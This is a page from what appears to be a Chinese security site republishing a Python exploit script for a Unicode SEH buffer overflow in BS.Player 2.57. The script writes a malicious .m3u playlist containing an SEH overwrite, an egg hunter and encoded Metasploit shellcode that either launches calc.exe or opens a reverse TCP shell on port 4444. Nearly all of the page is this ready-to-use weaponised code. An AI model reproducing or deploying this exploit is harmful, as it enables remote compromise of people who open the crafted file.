首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)
来源:www.invasao.com.br 作者:G0M3S 发布时间:2011-01-10  

#
#
#[+]Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH)
#[+]Date: 01\07\2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2
#[+]Version: 2.57
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#  #########      ##   #########      #########  ##     ###############
#  #########    ####   #########      #########  ##     ##           ##   
#  ##         ## ##    ##             ##         ##     ##           ##
#  ##        ##  ##    ##             ##         ##     ##           ##
#  ##       ########## ########       ########   ##     ##           ##
#  ##            ##          ##             ##   ##     ##           ##
#  ##            ##          ##             ##   ##     ##           ##
#  ########      ##    ########      #########   ##     ##           ##
#  ########      ##    ########      #########   \/     ###############
#                                             
#Created By C4SS!0 G0M3S
#Louredo_@hotmail.com
#www.invasao.com.br
#
#


import os
import sys
import time
import string

os.system("cls")
os.system("color 4f")

def usage():
        print "\n"
        print "[+]Exploit: Exploit Buffer Overflow Bsplayer(UNICODE-SEH)"
        print "[+]Date: 01\\07\\2010"
        print "[+]Author: C4SS!0 G0M3S"
        print "[+]Home: www.invasao.com.br"
        print "[+]E-mail: Louredo_@hotmail.com"
        print "[+]Version: 2.57"
        print "[+]Software: Bsplayer 2.57\n"
        print "[-]Note:"
        print "TO EXPLOIT THE RUN FILE NAME MUST BE FILE_NAME.M3U\n"


if((len(sys.argv)!=3) or (int(sys.argv[1])<1) or (int(sys.argv[1])>2)):
        usage()
        print "Payloads:\n1 - WinExec(\"Calc.exe\",0)\n2 - Reverse_Tcp_Shell\n"
        print "[-]Usage: "+sys.argv[0]+" <Playload Number> <File Name>"
        print "[-]Exemple: "+sys.argv[0]+" 1 Exploit.m3u"
        sys.exit(0)

usage()
buffer = "\x42" * 4102
nseh = "\x61\x6d"
seh = "\xde\x4e" #pop ebx - pop ebp - ret at 0x004E00DE [bsplayer.exe]
egg_hunter = "\x45\x61\x45\x61\x45\x50\x45\xc3"

junk = "\x45" * 1094
print "[*]Identifying the length Shellcode"
time.sleep(1)
if int(sys.argv[1]) == 2:
 shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
 "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNKWY7N4PV9X6PQX1PV9JYNZ9SDMTZTR" #
 "83SY0KT01RPLLLCBPLLT2RLPJX9KKTOX3NZUKKV0VLK3Y3MLRONMMJU2VWC8VQKQSOPTZT3CTK1LPUR6" #
 "KZR65RJC7NPWDLVRZQUMFMV85BXR7BOG8SCKUNXUVMVGIPMKJJZ6XSQ40ORI2UTOWNWRXVF679XJWYPL" #FROM METASPLOIT FRAMEWORK
 "OU2QOXQNN0GGLNM3HJLRVWUSKO4OWMVOZKXLKLY2B3U1BQMPEBVMQEEFULKP12N8GHWH43CROTS2NPPD" #
 "QT0YXLS5MOM3OCKSRWPFLJWWN19PSXXOFKYD7KLN3WYMFFEJY7LO785W6C1TM7MOURUH7EOM1FZTEMOJ" #SHELLCODE REVERSE_TCP_SHELL ON PORT 4444
 "28TUN2LK0SKNTKKPHJSDRKLFONNC2620QXQTRFZUE3UGR8TOL5V3YO47PRSMMBURNNL9MNEHNELX5NOW" #
 "Q8C5UPOLK3BIRSQBOXVDD9STOI8LHBM1Y3PEPOKMQOMKRN8JZIJ3MPJ0VRRYY92VP0DLVJ3TVJFWKSKB" #PROMPT:
 "QCMXW7O30CRZRF7JK7JV4S2SRM9M5RRTOZZVFYQQDKKW1LY7S6LZFJLLZNXMJB685QOJGLNKNITOCZSK" #
 "QITVVPONFL6LN0O1RVBINM6OLML4XL0TNL6RRVN28UOKSULQJXYLLY9NLM57LVDS8NY2PMQ3MORRMHQD" #C:\>Telnet 127.0.0.1 4444
 "BEINV9QY8U0MN1ZTUPPO3KGMVDOQWLNEUOJLWKE6UPNMBX12QURRNVJN78DYMXKOMHNA")            #
                                                                                       #
if int(sys.argv[1]) == 1:
        shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
        "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBIKY0NQ99GO3LLVRPHLXY2TMTL46QMNR"
        "8P1SHN853YXKLKSSHQXL4TENPSHWL3599RX6VNCJUKCH4VNSMM25ZOJP2MLWORBZMMM1DJ5QVO9MQ9W4"
        "V30ZUBQWZLFP5KELTXGCLKKMKLE2KZPNG9MOXKMNBNXMKVBK893KGOKSJXOPLPOMS8SR3UTPWKGHXOKT"
        "CDN4CMOQG1C34R171NSXML5WVKE7QSN4XL5VJZQM5W8O669OMOK90J9KN0Q31VVLNNOCUN957X7SHNOP"
        "YTP3KXWLE3O9XCKXJA")

print "[*]The Length Shellcode:"+str(len(shellcode))

time.sleep(1)

shellcode += "\x41" * 5000

file = str(sys.argv[2])

payload = buffer+nseh+seh+egg_hunter+junk+shellcode

op = "w"
print "[*]Creating Your File "+file
time.sleep(1)
try:
        f = open(file,op)
        f.write("http://"+payload)
        f.close()
        print "[*]The File "+file+" was Successfully Created"
except:
        print "[*]Error Creating File "+file


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Enzip 3.00 Buffer Overflow
·VideoSpirit Pro <= v1.68 Local
·proftpd multiple exploit for V
·NetSupport Manager Agent Remot
·HP Data Protector Manager v6.1
·Enzip 3.00 Buffer Overflow Exp
·Winamp 5.5.8 (in_mod plugin) S
·Microsoft Windows CreateSizedD
·Linux Kernel CAP_SYS_ADMIN to
·Concrete CMS 5.4.1.1 XSS / Cod
·IrfanView 4.28 Multiple Denial
·KingView 6.5.3 SCADA HMI Heap
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved